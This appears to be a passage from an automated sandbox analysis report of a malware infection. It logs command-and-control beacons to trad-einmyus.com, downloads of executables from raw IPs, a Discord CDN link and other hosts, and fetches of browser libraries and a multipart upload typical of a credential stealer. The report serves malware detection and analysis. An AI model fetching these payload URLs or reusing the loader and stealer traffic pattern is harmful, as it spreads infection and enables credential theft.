Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kdrrcifvupv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://froejfbfqcabvk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ijjaoopskaipyfot.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qlrqehiwqptv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 329Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkukpjjesbti.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mxmwgpprwcpwxem.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bglvkirrchdcy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syppprqoaeoyrm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://syrimjyxlgxo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://doewnlgtcbtsgiu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uetjtbokcendpi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obuibmhfpgvomgod.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukrvqlmerplrex.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tldcvhhvnmxh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ncehelngswfsf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://amrbjqbtgpnr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lejcpsbnxtuxdtx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 227Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://trlgbchacigdlq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://irythjvgtsstcpv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwelovrvoirfrsd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 283Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xvkfgvcftmyct.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpkolefxkmrqfjw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 355Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: GET /wek.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.253.69
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://duxgasiuxdjh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: GET /feswad.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.154.13.143
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dejiweyxqsl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyqccrxyqqnpjdg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: trad-einmyus.com
Source: global traffic HTTP traffic detected: GET /lend/jfesawdr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.233.132.167
Source: global traffic HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://thhfncmsprqy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: trad-einmyus.com
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.59
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 10_2_0040CF10
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /klok.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.safeautomationbd.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /get/Dztc3/3edag44.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.adttemp.com.br
Source: global traffic HTTP traffic detected: GET /attachments/1234297369122832404/1240152736272744458/Ogsxr.exe?ex=664585bd&is=6644343d&hm=ab86f976d0139ed85f7d9db2329fe1dca0c9135ad507ed65702b0c38a838bc63& HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sdfjhuz.com
Source: global traffic HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: sdfjhuz.com
Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic HTTP traffic detected: GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic HTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: cajgtus.com
Source: global traffic HTTP traffic detected: GET /wek.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.92.253.69
Source: global traffic HTTP traffic detected: GET /feswad.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.154.13.143
Source: global traffic HTTP traffic detected: GET /lend/jfesawdr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 193.233.132.167
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: E609.exe, 0000000F.00000003.2126413455.0000000009840000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: E609.exe, 0000000F.00000003.2126992854.0000000009840000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
Source: E609.exe, 0000000F.00000003.2127702492.0000000009840000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: trad-einmyus.com
Source: global traffic DNS traffic detected: DNS query: sdfjhuz.com
Source: global traffic DNS traffic detected: DNS query: api.2ip.ua
Source: global traffic DNS traffic detected: DNS query: cajgtus.com
Source: global traffic DNS traffic detected: DNS query: www.safeautomationbd.com
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: nessotechbd.com
Source: global traffic DNS traffic detected: DNS query: transfer.adttemp.com.br
Source: global traffic DNS traffic detected: DNS query: cdn.discordapp.com
Source: global traffic DNS traffic detected: DNS query: api.msn.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Sat, 25 May 2024 19:29:44 GMTalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 25 May 2024 19:29:54 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://nessotechbd.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingX-Endurance-Cache-Level: 2Transfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 25 May 2024 19:30:24 GMTServer: Transfer.sh HTTP Server 1.0Content-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffX-Made-With: <3 by DutchCodersX-Served-By: Proudly served by DutchCodersContent-Length: 15Connection: close
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 25 May 2024 19:30:32 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=_hnx.RasMHd9rAKtQBpiugUN70R9RGSs0a3As8OUYhs-1716665432-1.0.1.1-LMEPxQarqfdvcfblA_as1y5sxEH7NpD4UFtDd9qLMmuZeJm.LuMhukMUSc4NN_d8ONEJPfSM15yZZ1hUjlei.Q; path=/; expires=Sat, 25-May-24 20:00:32 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0dKLbD%2BiyBGP73Z6bVXwH%2FG%2Bkvxq4AAiW14%2B17Gxsui30bAluOyYJUaKH6oYX1Kk%2B8GVcwAawVDDol1JlKjRwOtU6Mk71NnR1SRRLlIZVKwhEypcR2qOzQXUpOmOBanOgPgThg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=pE84G.l23IqgyDRvhY6ciPU_hh1g3L9g.guRFnWtMhM-1716665432343-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8897f0c81c3478e2-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 38 0d 0a 04 00 00 00 79 fa f7 1c 0d 0a 30 0d 0a 0d 0a Data Ascii: 8y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Sat, 25 May 2024 19:29:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
